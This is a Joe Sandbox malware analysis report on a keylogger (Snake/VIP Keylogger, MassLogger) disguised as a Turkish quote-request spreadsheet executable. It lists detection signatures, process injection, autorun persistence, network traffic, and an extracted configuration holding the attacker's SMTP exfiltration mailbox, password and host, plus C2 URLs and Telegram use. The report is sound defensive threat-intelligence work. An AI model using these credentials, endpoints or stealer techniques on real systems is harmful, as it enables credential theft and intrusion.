Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Overview

General Information

Sample name:TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
renamed because original name is a hash value
Original sample name:TEKLF TALEP VE FYAT TEKLF_xlsx.exe
Analysis ID:1528904
MD5:1e9dc5041bf503cb63397e6a8f0bae9a
SHA1:9d21fe92ee433be3be4c09f8d242b4ad87d2158c
SHA256:e918f19d7627b7fa623f669351f2e00e029fa71bf08082c527da5b88ec53b9dc
Tags:exeMassLoggeruser-lowmal3
Infos:

Detection

MassLogger RAT, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Tojeiuai.exe (PID: 7104 cmdline: "C:\Users\user\AppData\Roaming\Tojeiuai.exe" MD5: 1E9DC5041BF503CB63397E6A8F0BAE9A)
    • InstallUtil.exe (PID: 5480 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Tojeiuai.exe (PID: 7104 cmdline: "C:\Users\user\AppData\Roaming\Tojeiuai.exe" MD5: 1E9DC5041BF503CB63397E6A8F0BAE9A)
    • InstallUtil.exe (PID: 3772 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2251979049.0000000002799000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000006.00000002.2251979049.0000000002AC7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
          00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 59 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5a40000.10.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              7.2.InstallUtil.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                7.2.InstallUtil.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
                • 0x2f064:$s1: UnHook
                • 0x2f06b:$s2: SetHook
                • 0x2f073:$s3: CallNextHook
                • 0x2f080:$s4: _hook
                3.2.Tojeiuai.exe.43e7d70.8.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  3.2.Tojeiuai.exe.43e7d70.8.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                    Click to see the 32 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Tojeiuai.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ProcessId: 6544, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Tojeiuai

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T12:45:00.369709+020028033053Unknown Traffic192.168.2.549706188.114.97.3443TCP
                    2024-10-08T12:45:15.932731+020028033053Unknown Traffic192.168.2.549722188.114.97.3443TCP
                    2024-10-08T12:45:22.339580+020028033053Unknown Traffic192.168.2.549754188.114.97.3443TCP
                    2024-10-08T12:45:22.339649+020028033053Unknown Traffic192.168.2.549755188.114.97.3443TCP
                    2024-10-08T12:45:23.461464+020028033053Unknown Traffic192.168.2.549769188.114.97.3443TCP
                    2024-10-08T12:45:23.570189+020028033053Unknown Traffic192.168.2.549770188.114.97.3443TCP
                    2024-10-08T12:45:23.638700+020028033053Unknown Traffic192.168.2.549771188.114.97.3443TCP
                    2024-10-08T12:45:25.727929+020028033053Unknown Traffic192.168.2.549785188.114.97.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T12:44:58.764930+020028032742Potentially Bad Traffic192.168.2.549704158.101.44.24280TCP
                    2024-10-08T12:44:59.780550+020028032742Potentially Bad Traffic192.168.2.549704158.101.44.24280TCP
                    2024-10-08T12:45:05.718074+020028032742Potentially Bad Traffic192.168.2.549707158.101.44.24280TCP
                    2024-10-08T12:45:14.405600+020028032742Potentially Bad Traffic192.168.2.549710158.101.44.24280TCP
                    2024-10-08T12:45:15.358712+020028032742Potentially Bad Traffic192.168.2.549710158.101.44.24280TCP
                    2024-10-08T12:45:16.561818+020028032742Potentially Bad Traffic192.168.2.549729158.101.44.24280TCP
                    2024-10-08T12:45:18.218098+020028032742Potentially Bad Traffic192.168.2.549738158.101.44.24280TCP
                    2024-10-08T12:45:20.936823+020028032742Potentially Bad Traffic192.168.2.549746158.101.44.24280TCP
                    2024-10-08T12:45:22.833988+020028032742Potentially Bad Traffic192.168.2.549746158.101.44.24280TCP
                    2024-10-08T12:45:24.077496+020028032742Potentially Bad Traffic192.168.2.549776158.101.44.24280TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}
                    Multi AV Scanner detection for domain / URL
                    Source: http://anotherarmy.dns.army:8081Virustotal: Detection: 17%Perma Link
                    Source: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedVirustotal: Detection: 7%Perma Link
                    Source: http://aborters.duckdns.org:8081Virustotal: Detection: 13%Perma Link
                    Source: http://varders.kozow.com:8081Virustotal: Detection: 14%Perma Link
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeReversingLabs: Detection: 34%
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeVirustotal: Detection: 42%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeReversingLabs: Detection: 34%
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeVirustotal: Detection: 42%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Tries to detect the country of the analysis system (by using the IP)
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49719 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49756 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49778 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49811 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49853 version: TLS 1.2
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2063013281.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.0000000003557000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2164548814.0000000003714000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.0000000004594000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2251979049.0000000002A40000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.0000000003787000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2063013281.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.0000000003557000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2164548814.0000000003714000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.0000000004594000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2251979049.0000000002A40000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.0000000003787000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 4x nop then jmp 05AEB25Fh0_2_05AEB1CB
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 4x nop then jmp 05AEB25Fh0_2_05AEB1D8
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_05B17D80
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_05B17D79
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 4x nop then jmp 05B136E8h0_2_05B13630
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 4x nop then jmp 05B136E8h0_2_05B13628
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 4x nop then jmp 05B19697h0_2_05B1966C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0105F8F1h2_2_0105F639
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0105FD49h2_2_0105FA90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06440D0Dh2_2_06440B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06441697h2_2_06440B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06442819h2_2_06442568
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 064431E0h2_2_06442DC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0644E501h2_2_0644E258
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0644E0A9h2_2_0644DE00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0644E959h2_2_0644E6B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0644F209h2_2_0644EF60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0644EDB1h2_2_0644EB08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0644F661h2_2_0644F3B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_06440040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0644FAB9h2_2_0644F810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0644D3A1h2_2_0644D0F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0644CF49h2_2_0644CCA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0644D7F9h2_2_0644D550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 064431E0h2_2_0644310E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 064431E0h2_2_06442DC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0644DC51h2_2_0644D9A8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 4x nop then jmp 05B1B25Fh3_2_05B1B1D8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 4x nop then jmp 05B1B25Fh3_2_05B1B1CB
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h3_2_05B47D80
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h3_2_05B47D79
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 4x nop then jmp 05B436E8h3_2_05B43630
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 4x nop then jmp 05B436E8h3_2_05B43628
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 4x nop then jmp 05B49697h3_2_05B4966C
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h3_2_05BED970
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 00B5F8E9h4_2_00B5F631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 00B5FD41h4_2_00B5FA88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 054BE501h4_2_054BE258
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 054BD7F9h4_2_054BD550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 054B31E0h4_2_054B2DC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 054B31E0h4_2_054B2DBF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 054BCF49h4_2_054BCCA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 054BF209h4_2_054BEF60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 054BE0A9h4_2_054BDE00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 054BE959h4_2_054BE6B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 054B2C19h4_2_054B2968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 054B31E0h4_2_054B310E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 054BDC51h4_2_054BD9A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_054B0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 054BFAB9h4_2_054BF810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 054BD3A1h4_2_054BD0F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 054BEDB1h4_2_054BEB08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 054B0D0Dh4_2_054B0B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 054B1697h4_2_054B0B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 054BF661h4_2_054BF3B8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h6_2_051BD970
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 4x nop then jmp 051FB25Fh6_2_051FB1D8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 4x nop then jmp 051FB25Fh6_2_051FB1D2
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h6_2_05227D79
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h6_2_05227D80
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 4x nop then jmp 052236E8h6_2_05223628
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 4x nop then jmp 052236E8h6_2_05223630
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 4x nop then jmp 05229697h6_2_0522966C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 02BAF8E9h7_2_02BAF631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 02BAFD41h7_2_02BAFA88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0676E959h7_2_0676E6B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06760D0Dh7_2_06760B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06761697h7_2_06760B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06762C19h7_2_06762968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 067631E0h7_2_06762DC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0676E501h7_2_0676E258
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0676E0A9h7_2_0676DE00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0676F209h7_2_0676EF60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0676EDB1h7_2_0676EB08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0676F661h7_2_0676F3B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_06760040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0676FAB9h7_2_0676F810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0676D3A1h7_2_0676D0F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0676CF49h7_2_0676CCA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0676D7F9h7_2_0676D550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 067631E0h7_2_0676310E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 067631E0h7_2_06762DBE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0676DC51h7_2_0676D9A8

                    Networking

                    barindex
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438e6a0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Tojeiuai.exe.43e7d70.8.raw.unpack, type: UNPACKEDPE
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
